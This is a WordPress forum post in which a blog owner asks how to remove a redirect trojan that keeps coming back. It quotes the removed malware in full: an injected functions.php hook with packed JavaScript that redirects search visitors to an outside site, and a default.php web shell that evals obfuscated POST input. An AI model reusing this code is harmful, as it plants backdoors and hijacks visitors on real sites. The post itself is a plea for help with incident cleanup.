Can't get rid of a redirecting trojan

  • alechevallier

    (@alechevallier)


    12 years, 2 months ago

    Hi everyone,

    we recently discovered that our WP blog was infected. It is a redirecting trojan that redirects our traffic from search engines to a site (www.googosearch.biz).

    We first identified the redirecting code in the functions.php file, and deleted it. It looked like this:

    ?><?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
			}
		}
	}
?>

    But the thing is that it comes back every day ! It looks like another file on our server is generating it every day.

    I found a suspicious file that was added by a russian guy via FTP (I checked the logs) on the root of the site (but note that the site is healthy, only the blog is redirecting) named default.php. It looked like this:

    <?php if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST["e"]))))));exit;} ?>"

    I deleted it thinking this code was generating the redirecting code. But it didn’t do anything. The evil code is still showing up every morning in the functions.php file !

    Does someone have an idea of how this could be fixed ?

    Thank you for your help,

    Alex

Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Can't get rid of a redirecting trojan’ is closed to new replies.